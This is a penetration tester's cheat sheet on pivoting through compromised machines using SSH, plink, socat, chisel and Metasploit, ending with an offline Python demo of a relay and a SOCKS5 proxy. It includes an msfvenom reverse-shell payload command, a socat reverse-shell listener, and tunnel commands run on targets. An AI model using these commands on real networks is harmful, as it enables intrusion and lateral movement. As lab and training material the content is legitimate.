Local port forwarding
Forward a local port to a remote host (the gateway makes the onward connection, so <remote host> must be reachable from the gateway, not from you)
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
Remote port forwarding
Forward a remote port to a local host (the gateway binds <remote port to bind>; by default it binds on loopback only, GatewayPorts yes in the gateway's sshd_config is needed to bind on other interfaces)
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic port forwarding (SOCKS proxy on your side, traffic exits at <target>)
ssh -D <local proxy port> -p <remote ssh port> <target>
socat file:`tty`,raw,echo=0 tcp-listen:8989   (not a forward: a socat listener that gives a fully interactive TTY when the target connects back with a socat pty reverse shell)
PORT FORWARDING "port to port":
----MSF---- Most platforms
Forward: get a meterpreter session on one of the dual-homed machines, then
  meterpreter> portfwd add -l 4445 -p 4443 -r <ip>   (Kali listens on 4445; every connection is relayed through the session to <ip>:4443)
Use -R to make it reverse (the target binds the port and the traffic comes back to Kali).
----SSH---- For Linux
~C   "if you already have an SSH session": press Enter, then ~C, on the SSH client side to get the ssh> prompt and add forwards to the live session. The lines below assume the target is the SSH client, logged in to Kali:
-R 8081:<ip>:80   (Kali listens on 8081 and gets it from <ip>:80 through the target)
Kali:8081 <------------ <ip>:80   Now you can access <ip>:80, which you didn't have direct access to
-L 8083:<kali ip>:8084   (the target listens on 8083 and sends it to Kali on 8084)
Kali:8084 <------------ target:8083 <------------ 2nd target:XXXX   run nc on Kali port 8084; if target:8083 receives a reverse shell, you will get it
For the reverse shell: msfvenom -p linux/x86/shell_reverse_tcp LHOST=<target ip as seen by the 2nd target> LPORT=8083 -f elf -o shell   Run it on the 2nd remote target to get a shell on Kali (-f elf, not exe: it is a Linux payload)
Or, if you don't have an SSH session yet, SSH to your Kali from the target machine. On Kali: service ssh start, add a user and give it /bin/false in /etc/passwd (it can still forward ports, it just never gets a shell). On target: ssh -N -R 12345:<host>:<port> <user>@<kali ip>   (-N is required here, otherwise the session ends as soon as /bin/false exits)
---PLINK---- Just like SSH, on Windows. On Kali: service ssh start, and transfer /usr/share/windows-binaries/plink.exe to the target machine
On Target: plink.exe <kali ip> -P 22 -C -N -L <port to listen on the target>:<host reachable from Kali>:<port> -l KALIUSER -pw PASS   (-L binds on the Windows target and exits at Kali; use -R <port on Kali>:<internal host>:<port> instead to make Kali listen and exit inside the target's network)
The first connection asks whether to trust Kali's host key; with no interactive console, answer it with: cmd.exe /c echo y | plink.exe <same arguments as above>
---SOCAT---- For Linux
Forward your 8083 to <ip>:443:   ./socat TCP4-LISTEN:8083,fork TCP4:<ip>:443   (fork gives every new connection its own relay instead of serving one client and exiting; add reuseaddr to the listen side if you need to restart it right away)
---CHISEL---- Most platforms
Remote static tunnels "port to port":
On Kali "reverse proxy listener": ./chisel server -p 8000 --reverse   (--reverse is required before a client may request R: remotes)
General command: ./chisel client <server ip>:<server port> L/R:[YOUR LOCAL IP]:<local port>:<remote host>:<remote port>   (the bind IP is optional and defaults to all interfaces; L: binds on the client, R: binds on the server)
Remote tunnels "access IP:PORT you couldn't access before": On Target: ./chisel client <kali ip>:8000 R:<port on Kali>:<internal host>:<internal port>   (Kali listens; connections leave the target towards the internal host)
Local tunnels "listen on the target for something, and send it to us": On Target: ./chisel client <kali ip>:8000 9001:<host reachable from Kali>:<port>   (the target listens on 9001; connections leave Kali, use 127.0.0.1 for Kali itself)
DYNAMIC "port to any": set up proxychains with socks5 on the proxy port (a line like socks5 127.0.0.1 <proxy port> in /etc/proxychains.conf), or set up a socks5 proxy in Firefox. For nmap use -Pn -sT (a SOCKS proxy only carries complete TCP connections: no ICMP/ARP host discovery, no SYN scan, no UDP) or use the tcp scanner in msf (auxiliary/scanner/portscan/tcp)
----MSF---- Most platforms
Get a meterpreter session on one of the dual-homed machines, add a route to the internal subnet through it (post/multi/manage/autoroute), then start a socks proxy (auxiliary/server/socks4a; renamed auxiliary/server/socks_proxy in Metasploit 5 and later) and point proxychains at it
----SSH---- For Linux: ssh -D <local proxy port> <target> as above (OpenSSH itself is the SOCKS server on Kali; add -N when you only want the proxy and no shell)
---PLINK--- Just like SSH, on Windows
On Target: plink.exe <kali ip> -P 22 -C -N -D 1080 -l KALIUSER -pw PASS   (caveat: -D binds the SOCKS listener on the machine running plink, i.e. the Windows target, tunnelled out through Kali; to get the listener on Kali with the exit inside the target's network you need reverse dynamic forwarding, which the OpenSSH client supports from 7.6 on with -R and only a port, no destination, or the MSF/chisel proxies)
---CHISEL---- Most platforms
On Kali: ./chisel server -p 8000 --reverse
On Target: ./chisel client <kali ip>:8000 R:8001:127.0.0.1:8001   and   ./chisel server -p 8001 --socks5   (the target runs its own socks5-capable chisel server and the reverse tunnel exposes it on Kali's port 8001)
On Kali: ./chisel client 127.0.0.1:8001 socks   (the "socks" remote opens a SOCKS5 listener on Kali, 127.0.0.1:1080 by default, that exits at the target; put it in proxychains)
Newer chisel versions do this in one step: On Target: ./chisel client <kali ip>:8000 R:socks   gives the SOCKS listener on Kali port 1080 with no second server on the target
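Both pivot types on this page in code, as an added example that is not from this page or from any of the tools it lists (socat, OpenSSH, PuTTY/plink, chisel, Metasploit): a "port to port" relay like socat TCP4-LISTEN:...,fork / ssh -L, and a "port to any" SOCKS5 CONNECT proxy like the one ssh -D or chisel socks hand to proxychains. Everything binds to 127.0.0.1 and is exercised against a constructed local echo service, so it runs offline. The function names (recvn, pipe, relay, serve, static_forward, socks5_proxy, via_static, via_socks5, demo), the OS-chosen ports and the echo service are my own assumptions; the SOCKS5 framing follows RFC 1928 (no-auth, CONNECT only).

```python
"""Teaching stand-ins (not code from socat, OpenSSH, PuTTY or chisel) for the two
pivot types above: a 'port to port' relay and a 'port to any' SOCKS5 CONNECT proxy."""
import contextlib
import socket
import threading

def recvn(sock, n):
    """Exactly n bytes (MSG_WAITALL); comes back short only if the peer closed early."""
    return sock.recv(n, socket.MSG_WAITALL)

def pipe(src, dst):
    """Copy src -> dst until EOF, then half-close dst so its peer sees the EOF as well."""
    with contextlib.suppress(OSError):
        while data := src.recv(4096):
            dst.sendall(data)
    with contextlib.suppress(OSError): dst.shutdown(socket.SHUT_WR)

def relay(a, b):
    """Full-duplex relay, one thread per direction (socat's bidirectional pipe)."""
    t = threading.Thread(target=pipe, args=(a, b), daemon=True); t.start()
    pipe(b, a)
    t.join()                      # both directions done before the caller closes anything

def serve(port, handler):
    """Listen on 127.0.0.1:port (0 = any free port), one thread per client like
    socat's ',fork'. Returns the bound port."""
    ls = socket.socket()
    ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    ls.bind(("127.0.0.1", port))
    ls.listen(16)
    def loop():
        while True:
            client, _ = ls.accept()
            threading.Thread(target=handler, args=(client,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return ls.getsockname()[1]

def static_forward(port, target):
    """'port to port': every client on port is relayed to one fixed (host, port)."""
    return serve(port, lambda c: relay(c, socket.create_connection(target)))

def socks5_proxy(port):
    """'port to any': the client names the destination per connection (RFC 1928,
    no-auth, CONNECT only, i.e. TCP streams only, hence nmap -Pn -sT through it)."""
    def handle(client):
        def reply(rep):           # VER REP RSV ATYP=IPv4 BND.ADDR/BND.PORT zeroed
            client.sendall(b"\x05" + bytes([rep]) + b"\x00\x01" + bytes(6))
        try:
            ver, nmethods = recvn(client, 2)
            if ver != 5 or 0 not in recvn(client, nmethods):
                client.sendall(b"\x05\xff"); return          # no acceptable auth method
            client.sendall(b"\x05\x00")                      # no-auth accepted
            _ver, cmd, _rsv, atyp = recvn(client, 4)
            if atyp == 1:                                    # IPv4 address
                host = socket.inet_ntoa(recvn(client, 4))
            elif atyp == 3:                                  # length-prefixed domain name
                host = recvn(client, recvn(client, 1)[0]).decode()
            else: return reply(8)                            # address type not supported
            dport = int.from_bytes(recvn(client, 2), "big")
            if cmd != 1: return reply(7)                     # only CONNECT, no BIND/UDP
            try:
                upstream = socket.create_connection((host, dport))
            except OSError: return reply(5)                  # REP 5: connection refused
            reply(0)                                         # success; pure relay from here
            relay(client, upstream)
        except (OSError, ValueError):
            pass                                             # malformed or torn-down client
        finally:
            client.close()
    return serve(port, handle)

def via_static(relay_port, msg):
    with socket.create_connection(("127.0.0.1", relay_port)) as s:
        s.sendall(msg)
        return s.recv(1024)

def via_socks5(proxy_port, host, dport, msg):
    """Speak SOCKS5 by hand (proxychains' job); returns the reply or the REP error code."""
    with socket.create_connection(("127.0.0.1", proxy_port)) as s:
        s.sendall(b"\x05\x01\x00")                           # greeting: offer no-auth
        assert recvn(s, 2) == b"\x05\x00"
        s.sendall(b"\x05\x01\x00\x03" + bytes([len(host)]) + host.encode()
                  + dport.to_bytes(2, "big"))                # CONNECT host:dport, ATYP=domain
        _ver, rep, _rsv, atyp = recvn(s, 4)
        recvn(s, {1: 4, 4: 16}[atyp] + 2)                    # discard BND.ADDR/BND.PORT
        if rep != 0: return rep
        s.sendall(msg)
        return s.recv(1024)

def demo():
    # Constructed 'internal service' you cannot reach directly: uppercases one message.
    internal = serve(0, lambda c: (c.sendall(c.recv(1024).upper()), c.close()))
    fwd = static_forward(0, ("127.0.0.1", internal))         # socat / ssh -L style
    socks = socks5_proxy(0)                                  # ssh -D / chisel socks style
    probe = socket.socket(); probe.bind(("127.0.0.1", 0))
    dead_port = probe.getsockname()[1]; probe.close()        # nothing listens here now
    return (via_static(fwd, b"hello"),
            via_socks5(socks, "localhost", internal, b"world"),
            via_socks5(socks, "127.0.0.1", dead_port, b"x"))  # -> (b'HELLO', b'WORLD', 5)
```

demo() returns (b'HELLO', b'WORLD', 5): the first reply came through the static relay, the second through SOCKS5 with a domain-name destination (what proxychains sends when proxy_dns is on), and the third is SOCKS5 REP 5 (connection refused) for a port nobody listens on, which proxychains shows as a failed hop rather than a hang. The proxy implementing only CONNECT is exactly why nmap through such a pivot needs -sT and -Pn: there is no way to push a raw SYN, ICMP or UDP packet through it.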